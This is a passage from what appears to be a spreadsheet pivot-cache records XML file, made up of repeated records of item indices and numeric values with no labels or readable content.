    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1408"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1375"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="10"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1409"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="39"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="15"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="35"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="9"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="30"/>
    <x v="1410"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1411"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1412"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1413"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1414"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1415"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1416"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="1"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="2"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1417"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="8"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="8"/>
    <x v="1418"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="8"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="23"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="18"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="44"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="102"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1419"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1420"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="50"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="280"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="1421"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="2"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="26"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1422"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1423"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1424"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="25"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="30"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="1425"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1426"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="1240"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2760"/>
    <x v="1399"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="1427"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="1428"/>
  </r>
  <r>
